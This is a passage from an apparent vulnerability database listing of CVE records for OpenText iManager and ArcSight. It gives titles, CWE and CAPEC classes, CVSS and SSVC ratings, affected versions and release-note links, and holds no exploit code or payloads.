                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:33.159Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch1_releasenotes/imanager326_patch1_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible XSS in iManager URL for access Component",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2022-26324",
        "datePublished": "2024-11-22T15:34:33.159Z",
        "dateReserved": "2022-02-28T21:48:42.461Z",
        "dateUpdated": "2024-11-26T14:20:05.412Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38135 (GCVE-0-2021-38135)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:11
    VLAI
    Title
    Possible External service interaction Vulnerability in OpenText iManager
    Summary
    Possible External Service Interaction attack in iManager has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-918 - Server-Side Request Forgery (SSRF)
    • CWE-406 - Insufficient Control of Network Message Volume (Network Amplification)
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.5.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38135",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:31.987983Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:11:18.827Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.5.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible \nExternal Service Interaction attack\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible \nExternal Service Interaction attack\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-664",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-664 Server Side Request Forgery"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 8.6,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918 Server-Side Request Forgery (SSRF)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-406",
                  "description": "CWE-406: Insufficient Control of Network Message Volume (Network Amplification)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:34.561Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager326_releasenotes/data/imanager326_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible External service interaction Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38135",
        "datePublished": "2024-11-22T15:34:34.561Z",
        "dateReserved": "2021-08-04T20:57:01.492Z",
        "dateUpdated": "2024-11-25T18:11:18.827Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38134 (GCVE-0-2021-38134)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Reflected and Stored XSS in OpenText iManager
    Summary
    Possible XSS in iManager URL for access Component has been discovered in OpenText™ iManager 3.2.5.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.5.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38134",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:19.614412Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:55.618Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.5.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XSS in iManager URL for access Component \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.5.0000\u003c/strong\u003e\u003cstrong\u003e. \u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XSS in iManager URL for access Component has been discovered in\nOpenText\u2122 iManager 3.2.5.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-591",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-591 Reflected XSS"
                }
              ]
            },
            {
              "capecId": "CAPEC-592",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-592 Stored XSS"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:36.023Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager326_releasenotes/data/imanager326_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Reflected and Stored XSS in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38134",
        "datePublished": "2024-11-22T15:34:36.023Z",
        "dateReserved": "2021-08-04T20:57:01.492Z",
        "dateUpdated": "2024-11-26T14:19:55.618Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38119 (GCVE-0-2021-38119)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Reflected Cross-Site Scripting (XSS) Vulnerability in OpenText iManager
    Summary
    Possible Reflected Cross-Site Scripting (XSS) Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38119",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:18.309502Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:46.120Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Reflected Cross-Site Scripting (XSS) Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Reflected Cross-Site Scripting (XSS) Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-591",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-591 Reflected XSS"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:38.178Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Reflected Cross-Site Scripting (XSS) Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38119",
        "datePublished": "2024-11-22T15:34:38.178Z",
        "dateReserved": "2021-08-04T20:57:01.488Z",
        "dateUpdated": "2024-11-26T14:19:46.120Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38118 (GCVE-0-2021-38118)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:19
    VLAI
    Title
    Possible Local Privilege Escalation Vulnerability in OpenText iManager
    Summary
    Possible improper input validation Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-250 - Execution with Unnecessary Privileges
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38118",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:16.954696Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:19:33.603Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible improper input validation Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible improper input validation Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-69",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-69 Target Programs with Elevated Privileges"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "availabilityImpact": "NONE",
                "baseScore": 5.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-250",
                  "description": "CWE-250: Execution with Unnecessary Privileges",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:40.183Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Local Privilege Escalation Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38118",
        "datePublished": "2024-11-22T15:34:40.183Z",
        "dateReserved": "2021-08-04T20:57:01.488Z",
        "dateUpdated": "2024-11-26T14:19:33.603Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38117 (GCVE-0-2021-38117)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:10
    VLAI
    Title
    Possible Remote Code Execution Vulnerability OpenText iManager
    Summary
    Possible Command injection Vulnerability in iManager has been discovered in OpenText™ iManager 3.2.4.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-94 - Improper Control of Generation of Code ('Code Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.4.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38117",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:19.610981Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:10:33.565Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Command injection Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.4.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Command injection Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager 3.2.4.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-242",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-242 Code Injection"
                }
              ]
            },
            {
              "capecId": "CAPEC-35",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-35 Leverage Executable Code in Non-Executable Files"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-94",
                  "description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:41.566Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Remote Code Execution Vulnerability OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38117",
        "datePublished": "2024-11-22T15:34:41.566Z",
        "dateReserved": "2021-08-04T20:57:01.487Z",
        "dateUpdated": "2024-11-25T18:10:33.565Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-38116 (GCVE-0-2021-38116)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:09
    VLAI
    Title
    Possible Command injection Vulnerability in OpenText iManager
    Summary
    Possible Elevation of Privilege Vulnerability in iManager has been discovered in OpenText™ iManager. This impacts all versions before 3.2.5
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.4.0000 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.1.0000 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.1.0000",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2021-38116",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:07:52.008299Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:09:04.657Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.4.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Elevation of Privilege Vulnerability\n\nin iManager \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager. This impacts all versions before 3.2.5\u003c/strong\u003e\u003cstrong\u003e\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Elevation of Privilege Vulnerability\n\nin iManager has been discovered in\nOpenText\u2122 iManager. This impacts all versions before 3.2.5"
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-248",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-248 Command Injection"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:43.211Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/imanager325_releasenotes/data/imanager325_releasenotes.html"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Command injection Vulnerability in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2021-38116",
        "datePublished": "2024-11-22T15:34:43.211Z",
        "dateReserved": "2021-08-04T20:57:01.487Z",
        "dateUpdated": "2024-11-25T18:09:04.657Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2024-9841 (GCVE-0-2024-9841)

    Vulnerability from nvd – Published: 2024-11-08 17:58 – Updated: 2024-11-08 21:12
    VLAI
    Title
    OpenText ArcSight Management Center and ArcSight Platform Stored XSS
    Summary
    A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in OpenText ArcSight Management Center and ArcSight Platform. The vulnerability could be remotely exploited.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
    Assigner
    References
    Impacted products
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2024-9841",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-08T21:12:30.732319Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-08T21:12:48.283Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
